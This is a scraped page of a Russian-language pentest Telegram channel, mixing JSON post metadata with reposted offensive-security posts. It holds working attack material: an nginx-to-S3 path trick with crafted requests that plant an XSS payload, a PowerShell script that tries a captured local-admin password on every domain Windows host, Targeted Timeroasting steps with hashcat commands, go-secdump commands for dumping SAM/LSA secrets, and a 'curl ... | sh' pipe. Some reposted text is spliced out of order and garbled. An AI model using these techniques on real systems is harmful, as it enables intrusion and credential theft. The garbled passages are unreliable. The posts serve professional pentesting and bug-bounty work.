Fsecurity | HH
Открыть в Telegram
👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb
Больше2 065
Подписчики
-224 часа
-67 дней
+430 дней
Архив постов
\n\nЕсли же запрос попадает во внутреннее объектное хранилище, то атакующий может перебирать существующие в системе бакеты, часть из которых может разрешать создание объектов PUT запросом без авторизации. Что в результате также приведет к возможности проэксплуатировать XSS.\n\n\nНо чаще встречается ситуация, когда проксирование запросов производится только из одной папки, например:\nlocation /static/ {\n set $s3_name \"company-bucket\";\n set $s3_host \"storage.yandexcloud.net\";\n \n rewrite ^(.*)$ /$s3_name$1 break;\n \n proxy_pass https://$s3_host;\n\nНо даже в данном случае конфигурация будет уязвима из-за разницы обработок переданного пути. Правило location и rewrite работают с нормализованным путем, а proxy_pass, в котором указан URI без пути, отправит ненормализованное значение.\n\nТаким образом для эксплуатации уязвимости необходимо отправить запрос, который в нормализованном виде попадет в location /static/, но будет начинаться с бакета, который контролирует атакующий.\nhttp://example.tld/attacker-bucket/..%2Fstatic/foo%0Abar\n=\nhttps://storage.yandexcloud.net/attacker-bucket/..%2Fstatic/foo%0Abar\n\nКак и в прошлом примере наличие в имени объекта символов %0A и /../ не помешают эксплуатации, так как это не файловая система и такой объект можно создать PUT запросом.\n\nТакже, если вы планируете искать подобные мисконфиги блэкбоксом, то нужно учитывать, что ошибки NoSuchObject и NoSuchBucket часто заменяют на дефолтную страницу 404, что может помешать.\nОбойти это можно вызывая ошибки с кодом, отличным от 404, например отправляя PUT запрос без указания Content-Length.\n\nPUT /attacker-bucket/..%2Fstatic/foo%0Abar HTTP/1.1\nHost: example.tld\nConnection: close","datePublished":"2025-01-25T08:04:15Z","dateModified":"2025-01-25T08:04:15Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":160},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-23T10:49:36Z"}}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4289","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4289","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4289","headline":"⚠️ Уязвимость 7-Zip, позволяющая обойти механизм защиты Windows 22 января был опубликован публичный Proof-of-…","articleBody":"⚠️ Уязвимость 7-Zip, позволяющая обойти механизм защиты Windows\n\n22 января был опубликован публичный Proof-of-Concept (PoC) для эксплуатации уязвимости CVE-2025-0411. Данная уязвимость позволяет обойти защитный механизм Windows, известный как Mark-of-the-Web (MOTW).\nMark-of-the-Web (MOTW) — это механизм защиты, встроенный в Windows и некоторые программы Microsoft, который помогает защитить пользователей от потенциально небезопасного контента, загружаемого из интернета. Он добавляет специальный флаг (метаданные) к файлам, загруженным из внешних источников, чтобы операционная система и приложения знали, что файл был получен из недоверенного источника.\n\nКак работает Mark-of-the-Web?\nКогда файл (например, документ, исполняемый файл или архив) загружается из интернета с помощью браузера или другой программы, Windows добавляет специальный заголовок в метаданные файла. Этот заголовок сохраняется в виде альтернативного потока данных (Alternate Data Stream), который поддерживается файловой системой NTFS.\n\nНапример, для файла, загруженного из интернета, MOTW добавляется в виде строки:\n[ZoneTransfer]\nZoneId=3\n\nЗначение ZoneId определяет источник файла:\nZoneId=0: Мой компьютер (локальная зона, безопасная).\nZoneId=1: Локальная интрасеть.\nZoneId=2: Доверенные сайты.\nZoneId=3: Интернет (недоверенная зона).\nZoneId=4: Ограниченные сайты.\n\nСсылка на публичный PoC:\nhttps://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC","datePublished":"2025-01-24T20:56:42Z","dateModified":"2025-01-24T20:56:42Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":175},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-23T11:37:15Z"}}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4288","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4288","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4288","headline":"🔗Ссылка: https://www.securitylab.ru/news/555730.php","articleBody":"🔗Ссылка:\nhttps://www.securitylab.ru/news/555730.php","datePublished":"2025-01-24T18:13:53Z","dateModified":"2025-01-24T18:13:53Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":154}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4287","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4287","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4287","headline":"Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈","articleBody":"Наш Discord сервер \n👆🏻Тут можно пообщаться и найти много полезной информации 🦈","datePublished":"2025-01-24T16:17:49Z","dateModified":"2025-01-24T16:17:49Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":153}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4286","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4286","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4286","headline":"🔗Ссылка: https://opennet.ru/62602/","articleBody":"🔗Ссылка:\nhttps://opennet.ru/62602/","datePublished":"2025-01-24T16:08:34Z","dateModified":"2025-01-24T16:08:34Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":163}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4285","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4285","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4285","headline":"🔗Ссылка: https://www.securitylab.ru/news/555704.php","articleBody":"🔗Ссылка:\nhttps://www.securitylab.ru/news/555704.php","datePublished":"2025-01-24T14:03:01Z","dateModified":"2025-01-24T14:03:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":152}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4284","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4284","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4284","headline":"🔗Ссылка: https://habr.com/ru/articles/875694/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/articles/875694/","datePublished":"2025-01-24T12:27:34Z","dateModified":"2025-01-24T12:27:34Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":139},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4283","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4283","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4283","headline":"Проверка локальных учетных записей Представим себе ситуацию, когда во время выполнения проекта мы обнаружили…","articleBody":"Проверка локальных учетных записей\nПредставим себе ситуацию, когда во время выполнения проекта мы обнаружили пароль от локального администратора, например, в групповых политиках, или от другой локальной учетной записи. Нам необходимо проверить на каких хостах эта учетная запись есть и валидна. Если под рукой есть «nxc», то проблем нет, а если нет? Можно воспользоваться PowerShell и написать небольшой скрипт для проверки локальной учетной записи. \n\nСкрипт будет запрашивать в домене все активные хосты с операционной системой Windows и выполнять проверку локальной учетной записи. Метод, используемый в данном скрипте для новых версий Windows, основан на обработке ошибки, это связанно с механизмами безопасности внедренных в операционную систему. Ошибки, возникающие при правильном и неправильном пароле, разные. И на основании этого мы можем делать предположение когда пароль является верным. а когда нет. \n\nfunction Check-LocalCredential{\n [CmdletBinding()]\n Param (\n [Parameter(Mandatory)]\n [string]\n $UserName,\n\n [Parameter(Mandatory)]\n [string]\n $Password\n )\n\n # Подключаем библиотеку для работы с учетными записями\n Add-Type -AssemblyName System.DirectoryServices.AccountManagement -ErrorAction Stop\n\n # В качестве контекста используем машину\n $ContextType = [DirectoryServices.AccountManagement.ContextType]::Machine\n\n $searcher = [adsisearcher]'(&(objectCategory=computer)(operatingsystem=*windows*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'\n $searcher.PageSize = 1000\n $comps=$searcher.FindAll()\n \n foreach($comp in $comps)\n {\n $ComputerName = $comp.Properties.dnshostname.Item(0)\n \n try\n {\n $PrincipalContext = [System.DirectoryServices.AccountManagement.PrincipalContext]::new($ContextType, $ComputerName)\n # Проверям учетные данные\n if($PrincipalContext.ValidateCredentials($UserName,$Password))\n {\n Write-Host -ForegroundColor Green \"[+] User $UserName has password $Password on computer $ComputerName\"\n }\n }\n catch [UnauthorizedAccessException]\n {\n Write-Host -ForegroundColor Yellow \"[*] User $UserName has password $Password on computer $ComputerName\"\n continue\n }\n catch \n {\n #Write-host -ForegroundColor Red \"[!] Error $_.Exception.Message \"\n continue\n }\n }\n} \n\nЗапускаем \n\nCheck-LocalCredential -Username Administrator -Password Qwerty123 \n\nЗеленый цвет вывода так же покажет, что учетная запись, от имени которой запускается скрипт, является локальным администратором на проверяемом хосте, желтый - пароль для локальной учетной записи верный. \n\nСтоит помнить, что скрипт проверяет валидность учетных данных, но не показывает членство в группе локальных администраторов.\n\n\n#Powershell #Внутрянка","datePublished":"2025-01-24T10:05:18Z","dateModified":"2025-01-24T10:05:18Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":120},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":4}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-22T11:12:30Z"}}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4282","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4282","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4282","headline":"Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈","articleBody":"Наш Discord сервер \n👆🏻Тут можно пообщаться и найти много полезной информации 🦈","datePublished":"2025-01-24T09:47:40Z","dateModified":"2025-01-24T09:47:40Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":126}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4281","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4281","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4281","headline":"Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею. В дв…","articleBody":"Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею.\nВ двух словах, что такое атака Timeroasting - Это атака, позволяющая получить хеш пароля машинной учетной записи. В целом, мы знаем, что это для нас бесполезно, т.к. пароль машины чаще всего очень длинный и сложный. Но есть сценарии, когда пароль все таки бывает простой и, в совокупности с атакой pre2k, можно построить интересный вектор. Об этом в своем блоге недавно писал @snovvcrash. \n\nСуть атаки Targeted Timeroasting немного в другом: если у нас есть права GenericWrite на объект пользователя, то мы можем превратить этого пользователя в компьютер (что?) и запросить хеш для него. Превратить пользователя в компьютер можно двумя простыми шагами:\n1. Меняем userAccountControl на 4096 (UF_WORKSTATION_TRUST_ACCOUNT)\n2. Переименовываем sAMAccountName в тоже имя, но со знаком $ на конце\nПосле этих действий сервис времени будет уверен, что это теперь компьютер и отдаст вам хеш. \nХорошо, как можно это использовать?\n\n1 Сценарий.\nУ нас есть права Domain Admins и не хочется шуметь с помощью атаки DcSync, тогда можно запустить Targeted Timeroasting на всех пользователей и вы получите хеши учеток, которые потом надо будет еще сбрутать.\n\n2 Сценарий.\nЗахватили учетку HelpDesk. Чаще всего у этой учетки есть права GenericWrite на половину домена. CA в домене нет, значит не провести атаку Shadow Creds. Проведя атаки Targeted Kerberoasting или Targeted AsReproasting мы получим билеты, которые нет возможности побрутить по большим словарям. А с помощью атаки Targeted Timeroasting мы, во-первых, не сильно нашумим на SIEM (не факт, конечно), а во-вторых, получим хеши, которые можно перебирать с чудовещной скоростью.\nОстальные сценарии придумайте сами :)\n\nСвежий ресерч про эту атаку вы можете прочитать в блоге. Брутить хеши на hashcat можно так:\ngit clone https://github.com/hashcat/hashcat && cd hashcat\ngit checkout 5236f3bd7 && make\n./hashcat -m31300\nДля атаки Targeted Timeroasting был разработан PowerShell скрипт. Но сегодня я переписал атаку на Python и выложил у себя в репозитории: https://github.com/PShlyundin/TimeSync\nНазвал инструмент TimeSync, потому что мне эта атака очень напомнила классический DcSync.","datePublished":"2025-01-24T08:05:25Z","dateModified":"2025-01-24T08:05:25Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":137},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-22T17:01:51Z"}}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4280","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4280","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4280","headline":"Добрый день, уважаемые подписчики! В сегодняшней статье мы с Вами рассмотрим атаку на беспроводные сети Wi-Fi…","articleBody":"Добрый день, уважаемые подписчики!\n\nВ сегодняшней статье мы с Вами рассмотрим атаку на беспроводные сети Wi-Fi типа Evil Twin, осуществляемую через поддельный портал авторизации с целью похищения данных. \n\nАктуальность данного материала обусловлена недостаточным качеством документации по инструментам, таким как eaphammer, которые позволяют проводить подобные атаки. \n\nhttps://teletype.in/@giscyberteam/captive_portal\n\n#WiFi #SocialEngineering","datePublished":"2025-01-23T20:24:02Z","dateModified":"2025-01-23T20:24:02Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":156},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-22T09:27:13Z"}}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4279","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4279","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4279","headline":"Кстати, вполне интересная схема про применение принципов нулевого доверия в рамках тестирования. Интересная о…","articleBody":"Кстати, вполне интересная схема про применение принципов нулевого доверия в рамках тестирования. Интересная она тем, что она практически базируется на принципах Secure by Design, что в целом забавно)) вообще, делать все как надо сразу - может и есть рецепт успеха?","datePublished":"2025-01-23T18:10:33Z","dateModified":"2025-01-23T18:10:33Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":153},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-23T05:59:01Z"}}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4278","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4278","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4278","headline":"🔗Ссылка: https://habr.com/ru/companies/bastion/articles/873850/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/companies/bastion/articles/873850/","datePublished":"2025-01-23T16:14:18Z","dateModified":"2025-01-23T16:14:18Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":172}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4277","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4277","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4277","headline":"🔗Ссылка: https://habr.com/ru/articles/873672/","articleBody":"🔗Ссылка:\nhttps://habr.com/ru/articles/873672/","datePublished":"2025-01-23T14:07:01Z","dateModified":"2025-01-23T14:07:01Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":147},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4276","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4276","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4276","headline":"🔄🖼️ go-secdump v0.4.0 Инструмент для удалённого копирования 🏠 Windows секретов (SAM, LSA) без сохранения на д…","articleBody":"🔄🖼️ go-secdump v0.4.0\n\nИнструмент для удалённого копирования 🏠 Windows секретов (SAM, LSA) без сохранения на диск\n\nДобавлено:\n\nAdded calculation of Kerberos AES Keys for the machine account password.\nCould be useful when NTLM auth is disabled\n\nПример:\n\n./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2\n\nRelay:\n\n./go-secdump --host 192.168.0.100 -n --relay\n\nОсновные опции:\n\n--host \n-P, --port \n-d, --domain \n-u, --user \n-p, --pass \n-n, --no-pass\n--hash \n--local\n-k, --kerberos\n--dc-ip\n--target-ip\n--aes-key\n--dump\n--sam\n--lsa\n--dcc2\n--relay\n--relay-port \n\n💻 Home\n💻 Download\n\n#soft #golang #redteam #gosecdump\n\n✈️ Pentest HaT","datePublished":"2025-01-23T12:07:02Z","dateModified":"2025-01-23T12:07:02Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":148}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2025-01-22T06:36:15Z"}}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4275","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4275","mainEntityOfPage":"https://telemetr.io/ru/channels/1492997419-hellohackingteam/posts/4275","headline":"🔗Ссылка: https://opennet.ru/62594/","articleBody":"🔗Ссылка:\nhttps://opennet.ru/62594/","datePublished":"2025-01-23T10:03:49Z","dateModified":"2025-01-23T10:03:49Z","author":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"publisher":{"@type":"Organization","name":"Fsecurity | HH","url":"https://telemetr.io/ru/channels/1492997419-hellohackingteam","image":"https://img.tlmtr.io/c/1D2sPx/5269607332834906944?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":148}]}}]}









2 063
Repost from PurpleBear
Backdooring Your Backdoors - Another $20 Domain, More Governments
Интересный ресерч от watchTowr из серии "hackers hacking hackers". В ходе исследования были проанализированы исходники различных веб-шеллов с открытым исходным кодом и обнаружены некоторые закладки недокументированные особенности😎 Например, некоторые возможно вспомнят историю с бэкдором в веб-шелле доступы данные телеметрии😎
Результаты анализа включают около 4000 взломанных веб-серверов, в том числе несколько ресурсов в доменной зоне вечном том, что мы как security профессионалы по умолчанию обязаны читать исходники любых opensource инструментов, которые используем в инфраструктуре заказчиков. Но ведь иногда бывают ситуации, когда проверенного инструмента просто нет под рукой и необходимо принести его с гитхаба из репозитория уважаемого автора offensive утилит.
Например, поставьте лайк👍 если когда-нибудь делали так:
просто по фану в рамках повышения осведомленности временно добавил в свой скрипт сбор телеметрии, где именно используется его инструмент, подробности и скриншоты будут в комментариях.
PS: Желаю всем удачного завершения рабочей недели и хороших выходных!
c99shcook, который сливал логопасы разработчику. Исследователи пошли дальше и зарегали на себя просроченные домены (40+), на которые отстукивались различные веб-шеллы и начали анализировать полученные .gov, на которые заливались различные веб-шеллы🙈
В целом ничего нового и так было всегда, но заставляет задуматься о curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Автор linpeas в прошлом году проводил эксперимент и 2 063
Repost from BlackFan
Небольшая заметка про уязвимую конфигурацию nginx при проксировании запросов на S3, которое позволило в том году налутать немного уязвимостей на BugBounty.
Объектные хранилища, совместимые с S3 API, используют два варианта указания имени бакета в запросе.
Virtual-hosted–style
GET /object-name HTTP/1.1 Host: bucket-name.s3endpointPath-style
GET /bucket-name/objectname HTTP/1.1 Host: s3endpointПри использовании path-style варианта может возникнуть довольно неочевидная проблема с конфигурацией nginx. Рассмотрим на примере сайта, который проксирует запросы подставляя имя бакета в путь с помощью следующего rewrite правила. В примерах будет использоваться Yandex Object Storage, но информация актуальна для всех S3 хранилищ.
location / {
set $s3_name "company-bucket";
set $s3_host "storage.yandexcloud.net";
rewrite ^(.*)$ /$s3_name$1 break;
proxy_pass https://$s3_host;
В nginx rewrite применяется к нормализованному пути и если в нем присутствует символ переноса строки %0A, то данное регулярное выражение не сработает, поскольку в нем используются якоря начала и конца строки.
http://example.tld/test/test.html = https://storage.yandexcloud.net/company-bucket/test/test.html http://example.tld/test/foo%0Abar = https://storage.yandexcloud.net/test/foo%0AbarЧто в результате приведет к возможности указать любое имя бакета в запросе. Причем декодированный символ %0A в имени объекта не помешает, так как S3 это не файловая система и такие имена разрешены. Таким образом, если используется публичное объектное хранилище, атакующий может создать в нем свой бакет с произвольным именем и загрузить на него файл foo%0Abar с XSS. Символ %0A в имени объекта должен быть декодированным, поэтому проще всего загрузить объект на него с помощью PUT запроса. В данном запросе подпись формируется с помощью Hackvertor тегов расширения для Burp Suite.
PUT /bucket-name/foo%0Abar HTTP/1.1
Host: storage.yandexcloud.net
Content-Type: text/html
Authorization: AWS ##ACCESS_KEY##:<@base64><@hex2ascii><@hmac_sha1('##SECRET-KEY##')><@d_burp_url>PUT%0A%0Atext/html%0A<@date("EEE, dd MMM yyyy HH:mm:ss z","GMT")/>%0A/bucket-name/foo%250Abar<@/d_burp_url><@/hmac_sha1><@/hex2ascii><@/base64>
Date: <@date("EEE, dd MMM yyyy HH:mm:ss z","GMT")/>
Content-Length: 25
<script>alert(1)</script>
Если же запрос попадает во внутреннее объектное хранилище, то атакующий может перебирать существующие в системе бакеты, часть из которых может разрешать создание объектов PUT запросом без авторизации. Что в результате также приведет к возможности проэксплуатировать XSS.
Но чаще встречается ситуация, когда проксирование запросов производится только из одной папки, например:
location /static/ {
set $s3_name "company-bucket";
